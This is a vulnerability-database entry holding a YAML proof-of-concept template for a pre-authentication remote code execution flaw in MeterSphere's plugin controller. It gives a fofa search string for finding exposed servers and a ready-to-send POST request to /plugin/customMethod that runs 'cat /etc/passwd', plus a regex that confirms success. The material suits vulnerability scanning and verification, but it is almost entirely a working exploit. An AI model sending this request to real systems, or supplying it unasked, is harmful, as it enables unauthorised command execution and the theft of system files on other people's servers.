metersphere-plugincontroller-rce: MeterSphere PluginController Pre-auth RCE

2025-08-01 MeterSphere PluginController PoC Public

Description

fofa: body="Metersphere"

PoC

id: metersphere-plugincontroller-rce

info:
  name: MeterSphere PluginController Pre-auth RCE
  author: xpoc
  severity: critical
  verified: true
  description: |-
    fofa: body="Metersphere"
  reference:
    - https://xz.aliyun.com/t/10772
  tags: metersphere,rce
  created: 2023/06/22

rules:
  r0:
    request:
      method: POST
      path: /plugin/customMethod
      headers:
        Content-Type: application/json
      body: '{"entry": "Evil", "request": "cat /etc/passwd"}'
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities